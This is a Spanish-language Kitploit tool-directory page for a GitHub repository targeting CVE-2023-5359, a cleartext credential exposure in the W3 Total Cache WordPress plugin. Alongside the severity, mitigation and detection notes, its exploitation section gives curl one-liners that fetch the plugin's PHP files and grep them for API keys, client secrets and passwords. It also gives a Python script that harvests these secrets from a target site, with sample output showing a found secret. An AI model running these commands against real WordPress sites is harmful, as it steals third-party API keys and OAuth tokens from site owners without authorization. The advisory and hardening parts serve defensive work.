Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-5359 — CVE-2023-5359 - Escáner de vulnerabilidad de almacenamiento en texto claro para W3 Total Cache. Detectar credenciales expuestas en el plugin W3 Total Cache en versiones ≤ 2.7.5. | Kitploit
Herramientas/GitHubGitHub/enzocipher/cve-2023-5359
Escáneres de VulnerabilidadesAtaques de ContraseñasExplotaciónRecopilación de InformaciónSeguridad WebAprendizaje y Educación
GitHubenzocipher/cve-2023-5359

CVE-2023-5359

CVE-2023-5359 - Escáner de vulnerabilidad de almacenamiento en texto claro para W3 Total Cache. Detectar credenciales expuestas en el plugin W3 Total Cache en versiones ≤ 2.7.5.

Ver Repositorio
hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-5359 - Vulnerabilidad de almacenamiento en texto claro en W3 Total Cache

Descripción

CVE-2023-5359 es una vulnerabilidad de almacenamiento en texto claro que afecta al plugin de WordPress W3 Total Cache en versiones ≤ 2.7.5. Esta vulnerabilidad permite a atacantes remotos acceder a credenciales sensibles almacenadas en archivos PHP sin cifrar que son accesibles públicamente.

Severidad

  • Puntuación CVSS: 7.5 (Alta)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • Tipo: Exposición de información sensible

Vulnerabilidad Técnica

Causa Raíz

W3 Total Cache almacena configuraciones y credenciales de API en archivos PHP dentro del directorio /wp-content/plugins/w3-total-cache/ sin protección adecuada. Estos archivos son accesibles a través de HTTP, exponiendo:

  • Claves API (CloudFlare, Google, etc.)
  • Secretos de cliente
  • Tokens OAuth
  • Credenciales de servicios externos

Archivos Afectados

root@kitploit:~
/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
/wp-content/plugins/w3-total-cache/Config.php
/wp-content/plugins/w3-total-cache/Cache_File.php

Explotación

Método Manual

root@kitploit:~
# Check if W3 Total Cache is installed
curl -s https://target.com/ | grep "w3-total-cache"

# Extract CloudFlare credentials
curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"

# Search all vulnerable files
for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
    echo "=== $file ==="
    curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
done

Script Automatizado

root@kitploit:~
#!/usr/bin/env python3
import requests
import re

target = "https://victim.com"
files = [
    "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
    "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php"
]

for file in files:
    response = requests.get(target + file)
    credentials = re.findall(r"(api_key|client_secret|password)\s*=\s*['\"](https://github.com/enzocipher/cve-2023-5359/blob/HEAD/%5B%5E%27%5C%22%5D+)", response.text)
    if credentials:
        print(f"[!] Credentials found in {file}:")
        for key, value in credentials:
            print(f"    {key}: {value}")

Impacto

Un atacante puede obtener:

  1. Credenciales de CloudFlare - Tomar control de CDN y DNS
  2. Claves API para servicios externos - Acceder a cuentas externas
  3. Tokens OAuth - Suplantar identidad
  4. Configuraciones de caché - Manipular contenido servido

Mitigación

Solución Inmediata

  1. Actualizar a W3 Total Cache ≥ 2.7.6
  2. Restringir el acceso a los archivos PHP en el directorio de plugins
  3. Revocar y regenerar todas las credenciales expuestas

Configuración Segura

root@kitploit:~
# .htaccess protection
<Files *.php>
    Deny from all
</Files>
<Files "w3-total-cache.php">
    Allow from all
</Files>

Detección

Comando de Verificación

root@kitploit:~
# Check for vulnerable version
curl -s https://target.com/wp-content/plugins/w3-total-cache/w3-total-cache.php | grep "Version"

Indicadores de Compromiso

  • Actividad inusual en APIs externas
  • Cambios en configuraciones de CloudFlare
  • Tráfico desde IPs no autorizadas a servicios conectados

Ejemplo de Hallazgo

root@kitploit:~
[*] Scanning: https://example.com
[+] W3 Total Cache detected
[+] Accessible file: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
[!] CREDENTIALS FOUND:
    client_id: GAxxxxxxxxxxxx78
    client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345

Referencias

  • CVE-2023-5359
  • W3 Total Cache Changelog
  • WordPress Security Team

Aviso Legal

Este repositorio es solo para fines educativos y pruebas de penetración autorizadas. El uso malicioso de esta información está estrictamente prohibido.


¿Encontraste útil esta información? ¡Dale una estrella al repositorio!

Última actualización: noviembre de 2025

Descargar herramienta